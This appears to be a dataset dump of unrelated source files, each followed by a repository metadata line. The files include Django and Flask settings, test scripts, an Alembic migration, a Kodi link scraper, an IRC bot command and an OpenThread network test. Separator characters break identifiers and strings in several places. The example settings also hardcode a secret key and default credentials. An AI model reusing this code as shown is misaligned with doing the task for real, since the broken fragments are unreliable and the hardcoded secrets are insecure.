# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR | A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
"""
He | lpers for templatetags' unit tests in Django webframework
"""
from django.conf import settings
encoding = 'utf-8'
settings.configure(
TEMPLATE_DIRS=(),
TEMPLATE_CONTEXT_PROCESSORS=(),
TEMPLATE_LOADERS=(),
INSTALLED_APPS=('pytils',),
DEFAULT_CHARSET=encoding,
)
from django import template
from django.template import loader
from pytils.templatetags import pseudo_str
import unittest
def pstr(ustr):
"""
Provide/Pseudo unicode
"""
return pseudo_str(ustr, encoding, None)
class TemplateTagTestCase(unittest.TestCase):
"""
TestCase for testing template tags and filters
"""
def check_template_tag(self, template_name, template_string, context, result_string):
"""
Method validates output of template tag or filter
@param template_name: name of template
@type template_name: C{str}
@param template_string: contents of template
@type template_string: C{str} or C{unicode}
@param context: rendering context
@type context: C{dict}
@param result_string: reference output
@type result_string: C{str} or C{unicode}
"""
def test_template_loader(template_name, template_dirs=None):
return pstr(template_string), template_name
loader.template_source_loaders = [test_template_loader,]
output = loader.get_template(template_name).render(template.Context(context))
self.assertEquals(output, pstr(result_string))
|
Valloric/ycmd | .ycm_extra_conf.py | Python | gpl-3.0 | 7,079 | 0.022461 | # This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This | is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell | , or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
from distutils.sysconfig import get_python_inc
import platform
import os.path as p
import subprocess
DIR_OF_THIS_SCRIPT = p.abspath( p.dirname( __file__ ) )
DIR_OF_THIRD_PARTY = p.join( DIR_OF_THIS_SCRIPT, 'third_party' )
DIR_OF_WATCHDOG_DEPS = p.join( DIR_OF_THIRD_PARTY, 'watchdog_deps' )
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
database = None
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# You 100% do NOT need -DUSE_CLANG_COMPLETER and/or -DYCM_EXPORT in your flags;
# only the YCM source code needs it.
'-DUSE_CLANG_COMPLETER',
'-DYCM_EXPORT=',
'-DYCM_ABSEIL_SUPPORTED',
# THIS IS IMPORTANT! Without the '-x' flag, Clang won't know which language to
# use when compiling headers. So it will guess. Badly. So C++ headers will be
# compiled as C headers. You don't want that so ALWAYS specify the '-x' flag.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
'-isystem',
'cpp/absl',
'-isystem',
'cpp/pybind11',
'-isystem',
'cpp/whereami',
'-isystem',
'cpp/BoostParts',
'-isystem',
get_python_inc(),
'-isystem',
'cpp/llvm/include',
'-isystem',
'cpp/llvm/tools/clang/include',
'-I',
'cpp/ycm',
'-I',
'cpp/ycm/ClangCompleter',
'-isystem',
'cpp/ycm/tests/gmock/googlemock/include',
'-isystem',
'cpp/ycm/tests/gmock/googletest/include',
'-isystem',
'cpp/ycm/benchmarks/benchmark/include',
'-std=c++17',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
def IsHeaderFile( filename ):
extension = p.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def FindCorrespondingSourceFile( filename ):
if IsHeaderFile( filename ):
basename = p.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if p.exists( replacement_file ):
return replacement_file
return filename
def PathToPythonUsedDuringBuild():
try:
filepath = p.join( DIR_OF_THIS_SCRIPT, 'PYTHON_USED_DURING_BUILDING' )
with open( filepath ) as f:
return f.read().strip()
except OSError:
return None
def Settings( **kwargs ):
# Do NOT import ycm_core at module scope.
import ycm_core
global database
if database is None and p.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
language = kwargs[ 'language' ]
if language == 'cfamily':
# If the file is a header, try to find the corresponding source file and
# retrieve its flags from the compilation database if using one. This is
# necessary since compilation databases don't have entries for header files.
# In addition, use this source file as the translation unit. This makes it
# possible to jump from a declaration in the header file to its definition
# in the corresponding source file.
filename = FindCorrespondingSourceFile( kwargs[ 'filename' ] )
if not database:
return {
'flags': flags,
'include_paths_relative_to_dir': DIR_OF_THIS_SCRIPT,
'override_filename': filename
}
compilation_info = database.GetCompilationInfoForFile( filename )
if not compilation_info.compiler_flags_:
return {}
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object.
final_flags = list( compilation_info.compiler_flags_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
return {
'flags': final_flags,
'include_paths_relative_to_dir': compilation_info.compiler_working_dir_,
'override_filename': filename
}
if language == 'python':
return {
'interpreter_path': PathToPythonUsedDuringBuild()
}
return {}
def PythonSysPath( **kwargs ):
sys_path = kwargs[ 'sys_path' ]
interpreter_path = kwargs[ 'interpreter_path' ]
major_version = subprocess.check_output( [
interpreter_path, '-c', 'import sys; print( sys.version_info[ 0 ] )' ]
).rstrip().decode( 'utf8' )
sys_path[ 0:0 ] = [ p.join( DIR_OF_THIS_SCRIPT ),
p.join( DIR_OF_THIRD_PARTY, 'bottle' ),
p.join( DIR_OF_THIRD_PARTY, 'regex-build' ),
p.join( DIR_OF_THIRD_PARTY, 'frozendict' ),
p.join( DIR_OF_THIRD_PARTY, 'jedi_deps', 'jedi' ),
p.join( DIR_OF_THIRD_PARTY, 'jedi_deps', 'parso' ),
p.join( DIR_OF_WATCHDOG_DEPS, 'watchdog', 'build', 'lib3' ),
p.join( DIR_OF_WATCHDOG_DEPS, 'pathtools' ),
p.join( DIR_OF_THIRD_PARTY, 'waitress' ) ]
sys_path.append( p.join( DIR_OF_THIRD_PARTY, 'jedi_deps', 'numpydoc' ) )
return sys_path
|
k0pernicus/giwyn | giwyn/lib/settings/settings.py | Python | gpl-3.0 | 261 | 0 | def init():
global ARGS
global CONFIG_FILE_CONTENT
global CONFIG_FILE_NAME
global CONFIG_FILE_PATH
global GIT_OBJECTS
| ARGS = []
CONFIG_FILE_CONTENT = []
CONFIG_FILE_NAME = " | .giwyn"
CONFIG_FILE_PATH = ""
GIT_OBJECTS = []
|
vlukes/sfepy | tests/test_input_thermo_elasticity_ess.py | Python | bsd-3-clause | 219 | 0.009132 | from __future__ import absolute_import
input_name = '../examples/multi_physics/thermo_elasticity_ | ess.py'
output_name = 'test_thermo_elasticity_ess.vtk'
from tests | _basic import TestInput
class Test(TestInput):
pass
|
caspyyy/SCRAPY_DDS | example_project/example_project/settings.py | Python | bsd-3-clause | 5,820 | 0.001546 | # Django settings for example_project project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_ROOT, 'stockExchange.db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'h51vphv5#0957l2o(jrdsai!l54h(kh&-m^4-1xdd7nwa6=1^^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'example_project.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'example_project.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages', |
'django.contrib.staticfiles',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
| 'south',
'kombu.transport.django',
'djcelery',
'dynamic_scraper',
'open_news',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# django-celery settings
import djcelery
djcelery.setup_loader()
BROKER_HOST = "localhost"
BROKER_PORT = 5672
BROKER_BACKEND = "django"
BROKER_USER = "guest"
BROKER_PASSWORD = "guest"
BROKER_VHOST = "/"
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
|
Vogtinator/micropython | tests/pyb/can.py | Python | mit | 841 | 0.002378 | from pyb import CAN
CAN.initfilterbanks(14)
can = CAN(1)
print(can)
can.init(CAN.LOOPBACK)
print(can)
print(can.any(0))
# Catch all filter
can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0))
can.send('abcd', 123)
print(can.any(0))
print(can.recv(0))
can.send('abcd', -1)
print(can.recv(0))
can.send('abcd', 0x7FF + 1)
print(can.recv(0))
# Test too long message
try:
can.send('abcdefghi', 0x7FF)
except ValueError:
print('passed')
else:
print('failed')
del can
# Testing extended IDs
can = CAN(1, CAN.LOOPBACK, extframe = True)
# Catch all filter
can.setfilter(0, CAN.MASK32, 0, (0, 0))
print(can)
try:
| can.send('abcde', 0x7 | FF + 1)
except ValueError:
print('failed')
else:
r = can.recv(0)
if r[0] == 0x7FF+1 and r[3] == b'abcde':
print('passed')
else:
print('failed, wrong data received')
|
ballouche/navitia | source/sql/alembic/versions/5a590ae95255_manage_frames.py | Python | agpl-3.0 | 1,090 | 0.013761 | """manage frames
Revision ID: 5a590ae95255
Revises: 59f4456a029
Create Date: 2015-11-25 16:43:10.104442
"""
# revision identifiers, used by Alembic.
revision = '5a590ae95255'
down_revision = '14346346596e'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table('frame',
sa.Column('id', sa.BIGINT(), nullable=False),
sa.Column('uri', sa.TEXT(), nullable=False),
sa.Column('description', sa.TEXT(), nullable=True),
sa.Column('system', sa.TEXT(), nullable=True),
sa.Column('start_date', sa.DATE(), nullable=False),
sa.Column('end_date', sa.DATE(), nullable=False),
sa.Co | lumn('contributor_id', sa.BIGINT(), nullable=False),
sa.ForeignKeyConstraint(['contributor_id'], [u'navitia.contributor.id'], name=u'contributor_frame_fkey'),
sa.PrimaryKeyConstraint('id'),
schema='navitia'
)
op.a | dd_column('vehicle_journey', sa.Column('frame_id', sa.BIGINT(), nullable=True), schema='navitia')
def downgrade():
op.drop_column('vehicle_journey', 'frame_id', schema='navitia')
op.drop_table('frame', schema='navitia')
|
repotvsupertuga/tvsupertuga.repository | script.module.openscrapers/lib/openscrapers/sources_openscrapers/de/cine.py | Python | gpl-2.0 | 3,466 | 0.003174 | # -*- coding: UTF-8 -*-
# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ------------------------------------------------------------- | ------------- | --
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import json
import re
import urllib
import urlparse
from openscrapers.modules import client
from openscrapers.modules import source_utils
class source:
def __init__(self):
self.priority = 1
self.language = ['de']
self.domains = ['cine.to']
self.base_link = 'https://cine.to'
self.request_link = '/request/links'
self.out_link = '/out/%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
return urllib.urlencode({'imdb': imdb})
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if url == None:
return sources
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
data = urllib.urlencode({'ID': re.sub('[^0-9]', '', str(data['imdb'])), 'lang': 'de'})
data = client.request(urlparse.urljoin(self.base_link, self.request_link), post=data, XHR=True)
data = json.loads(data)
data = [(i, data['links'][i]) for i in data['links'] if 'links' in data]
data = [(i[0], i[1][0], (i[1][1:])) for i in data]
for hoster, quli, links in data:
valid, hoster = source_utils.is_host_valid(hoster, hostDict)
if not valid: continue
for link in links:
try:
sources.append(
{'source': hoster, 'quality': 'SD', 'language': 'de', 'url': self.out_link % link,
'direct': False, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
try:
url = urlparse.urljoin(self.base_link, url)
url = client.request(url, output='geturl')
if self.out_link not in url:
return url
except:
return
|
munin/munin | deprecated/cajbook.py | Python | gpl-2.0 | 7,158 | 0.002375 | """
Loadable.Loadable subclass
"""
# This file is part of Munin.
# Munin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# Munin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Munin; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# This work is Copyright (C)2006 by Andreas Jacobsen
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
class cajbook(loadable.loadable):
def __init__(self, client, conn, cursor):
loadable.loadable.__init__(self, client, conn, cursor, 50)
self.paramre = re.compile(r"^\s*(\d+)[. :-](\d+)[. :-](\d+)\s+(\d+)(\s+(yes))?")
self.usage = self.__class__.__name__ + " <x:y:z> (<eta>|<landing tick>)"
def execute(self, nick, username, host, target, prefix, command, user, access):
m = self.commandre.search(command)
if not m:
return 0
m = self.paramre.search(irc_msg.command_parameters)
if not m:
self.client.reply(prefix, nick, target, "Usage: %s" % (self.usage,))
return 0
x = m.group(1)
y = m.group(2)
z = m.group(3)
when = int(m.group(4))
override = m.group(6)
if access < self.level:
self.client.reply(
prefix,
nick,
target,
"You do not have enough access to use this command",
)
return 0
if int(x) != 6 or int(y) != 8:
self.client.reply(
prefix,
nick,
target,
"This command only works for the galaxy 2:5, if you need a normal booking try !book",
)
return 0
p = loadable.planet(x=x, y=y, z=z)
if not p.load_most_recent(self.conn, self.client, self.cursor):
self.client.reply(
prefix, nick, target, "No planet matching '%s:%s:%s' found" % (x, y, z)
)
return 1
else:
i = loadable.intel(pid=p.id)
if not i.load_from_db(self.conn, self.client, self.cursor):
pass
else:
if i and i.alliance and i.alliance.lower() == "ascendancy":
self.client.reply(
prefix,
nick,
target,
"%s:%s:%s is %s in Ascendancy. Quick, launch before they notice the highlight."
% (x, y, z, i.nick or "someone"),
)
return 0
curtick = self.current_tick()
tick = -1
eta = -1
if when < 80:
tick = curtick + when
eta = when
elif when < curtick:
self.client.reply(
prefix,
nick,
target,
"Can not book targets in the past. You wanted tick %s, but current tick is %s."
% (when, curtick),
)
return 1
else:
tick = when
eta = tick - curtick
if tick > 32767:
tick = 32767
args = ()
query = "SELECT t1.id AS id, t1.nick AS nick, t1.pid AS pid, t1.tick AS tick, t1.uid AS uid, t2.pnick AS pnick, t2.userlevel AS userlevel, t3.x AS x, t3.y AS y, t3.z AS z"
query += " FROM target AS t1"
query += " INNER JOIN planet_dump AS t3 ON t1.pid=t3.id"
query += " LEFT JOIN user_list AS t2 ON t1.uid=t2.id"
query += " WHERE"
query += " t1.tick > %s"
query += (
" AND t3.tick = (SELECT MAX(tick) FROM updates) AND t3.x=%s AND t3.y=%s"
)
query += " AND t3.z=%s"
self.cursor.execute(query, (tick, x, y, z))
if self.cursor.rowcount > 0 and not override:
reply = (
"There are already bookings for that target after landing pt %s (eta %s). To see status on this target, do !status %s:%s:%s."
% (tick, eta, x, y, z)
)
reply += (
" To force booking at your desired eta/landing tick, use !book %s:%s:%s %s yes (Bookers:"
% (x, y, z, tick)
)
prev = []
for r in self.cursor.fetchall():
owner = "nick:" + r["nick"]
if r["pnick"]:
owner = "user:" + r["pnick"]
prev.append("(%s %s)" % (r["tick"], owner))
reply += " " + string.join(prev, ", ")
reply += " )"
self.client.reply(prefix, nick, target, reply)
return 1
uid = None
if user:
u = loadable.user(pnick=user)
if u.load_from_db(self.conn, self.client, self.cursor):
uid = u.id
query = "INSERT INTO target (nick,pid,tick,uid) VALUES (%s,%s,%s,%s)"
try:
s | elf.cursor.execute(query, (nick, p.id, tick, uid))
if uid:
reply = "Booked landing on %s:%s:%s tick %s for user %s" % (
p.x,
p.y,
p.z,
tick,
user,
| )
else:
reply = "Booked landing on %s:%s:%s tick %s for nick %s" % (
p.x,
p.y,
p.z,
tick,
nick,
)
except psycopg.IntegrityError:
query = "SELECT t1.id AS id, t1.nick AS nick, t1.pid AS pid, t1.tick AS tick, t1.uid AS uid, t2.pnick AS pnick, t2.userlevel AS userlevel "
query += " FROM target AS t1 LEFT JOIN user_list AS t2 ON t1.uid=t2.id "
query += " WHERE t1.pid=%s AND t1.tick=%s"
self.cursor.execute(query, (p.id, tick))
book = self.cursor.fetchone()
if not book:
raise Exception(
"Integrity error? Unable to booking for pid %s and tick %s"
% (p.id, tick)
)
if book["pnick"]:
reply = (
"Target %s:%s:%s is already booked for landing tick %s by user %s"
% (p.x, p.y, p.z, book["tick"], book["pnick"])
)
else:
reply = (
"Target %s:%s:%s is already booked for landing tick %s by nick %s"
% (p.x, p.y, p.z, book["tick"], book["nick"])
)
except:
raise
self.client.reply(prefix, nick, target, reply)
return 1
|
ukgovdatascience/classifyintentsapp | app/__init__.py | Python | mit | 1,824 | 0 | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
bootstrap = Bootstrap()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
# import config here rather than at module level to ensure that .env values
# are loaded into the environment first when running manage.py
from config import config
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
# Set jquery version
from flask_bootstrap import WebCDN
app.extensions['bootstrap']['cdns']['jquery'] = WebCDN(
'//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/'
)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
pagedown.init_app(app)
if not app.debug and not app.testing and not app.config['SSL_DISABLE']:
from flask_sslify import SSLify
sslify = SSLify(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
# Tell browser not to cache any HTML responses, as most pages have
# sensitive information in them. (But | CSS should be cached as normal.)
@app.after_request
def apply_caching(response):
if response.headers.get('Content-Type', '').startswith('text/html'):
response.headers['Cache-control'] = 'no-store'
response.headers['Pragma' | ] = 'no-cache'
return response
return app
|
LeZhang2016/openthread | tests/scripts/thread-cert/Cert_9_2_18_RollBackActiveTimestamp.py | Python | bsd-3-clause | 6,936 | 0.001153 | #!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import time
import unittest
import config
import node
KEY1 = '00112233445566778899aabbccddeeff'
KEY2 = 'ffeeddccbbaa99887766554433221100'
CHANNEL_INIT = 19
PANID_INIT = 0xface
COMMISSIONER = 1
LEADER = 2
ROUTER1 = 3
ROUTER2 = 4
ED1 = 5
SED1 = 6
MTDS = [ED1, SED1]
class Cert_9_2_18_RollBackActiveTimestamp(unittest.TestCase):
def setUp(self):
self.simulator = config.create_default_simulator()
self.nodes = {}
for i in range(1,7):
self.nodes[i] = node.Node(i, (i in MTDS), simulator=self.simulator)
self.nodes[COMMISSIONER].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
self.nodes[COMMISSIONER].set_mode('rsdn')
self.nodes[COMMISSIONER].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[COMMISSIONER].enable_whitelist()
self.nodes[COMMISSIONER].set_router_selection_jitter(1)
self.nodes[LEADER].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
self.nodes[LEADER].set_mode('rsdn')
self.nodes[LEADER].set_partition_id(0xffffffff)
self.nodes[LEADER].add_whitelist(self.nodes[COMMISSIONER].get_addr64())
self.nodes[LEADER].add_whitelist(self.nodes[ROUTER1].get_addr64())
self.nodes[LEADER].enable_whitelist()
self.nodes[LEADER].set_router_selection_jitter(1)
self.nodes[ROUTER1].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
self.nodes[ROUTER1].set_mode('rsdn')
self.nodes[ROUTER1].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ROUTER1].add_whitelist(self.nodes[ROUTER2].get_addr64())
self.nodes[ROUTER1].add_whitelist(self.nodes[ED1].get_addr64())
self.nodes[ROUTER1].add_whitelist(self.nodes[SED1].get_addr64())
self.nodes[ROUTER1].enable_whitelist()
self.nodes[ROUTER1].set_router_selection_jitter(1)
self.nodes[ROUTER2].set_active_dataset(1, channel=CHANNEL_INIT, panid=PANID_INIT, master_key=KEY1)
self.nodes[ROUTER2].set_mode('rsdn')
self.nod | es[ROUTER2].add_whitelist(self.nodes[ROUTER1].get_addr64())
self.nodes[ROUTER2].enable_whitelist()
self.nodes[ROUTER2].set_router_selection_jitter(1)
self.nodes[ED1].set_channel(CHANNEL_INIT)
self.nodes[ED1].set_masterkey(KEY1)
self.nodes[ED1].set_mode('rsn | ')
self.nodes[ED1].set_panid(PANID_INIT)
self.nodes[ED1].add_whitelist(self.nodes[ROUTER1].get_addr64())
self.nodes[ED1].enable_whitelist()
self.nodes[SED1].set_channel(CHANNEL_INIT)
self.nodes[SED1].set_masterkey(KEY1)
self.nodes[SED1].set_mode('s')
self.nodes[SED1].set_panid(PANID_INIT)
self.nodes[SED1].add_whitelist(self.nodes[ROUTER1].get_addr64())
self.nodes[SED1].enable_whitelist()
self.nodes[SED1].set_timeout(config.DEFAULT_CHILD_TIMEOUT)
def tearDown(self):
for node in list(self.nodes.values()):
node.stop()
node.destroy()
def test(self):
self.nodes[LEADER].start()
self.simulator.go(5)
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
self.nodes[COMMISSIONER].start()
self.simulator.go(5)
self.assertEqual(self.nodes[COMMISSIONER].get_state(), 'router')
self.nodes[COMMISSIONER].commissioner_start()
self.simulator.go(3)
self.nodes[ROUTER1].start()
self.simulator.go(5)
self.assertEqual(self.nodes[ROUTER1].get_state(), 'router')
self.nodes[ED1].start()
self.simulator.go(5)
self.assertEqual(self.nodes[ED1].get_state(), 'child')
self.nodes[SED1].start()
self.simulator.go(5)
self.assertEqual(self.nodes[SED1].get_state(), 'child')
self.nodes[COMMISSIONER].send_mgmt_active_set(active_timestamp=20000,
network_name='GRL')
self.simulator.go(5)
self.nodes[COMMISSIONER].send_mgmt_pending_set(pending_timestamp=20,
active_timestamp=20,
delay_timer=20000,
network_name='Shouldnotbe')
self.simulator.go(5)
self.nodes[COMMISSIONER].send_mgmt_pending_set(pending_timestamp=20,
active_timestamp=20,
delay_timer=20000,
network_name='MyHouse',
master_key=KEY2)
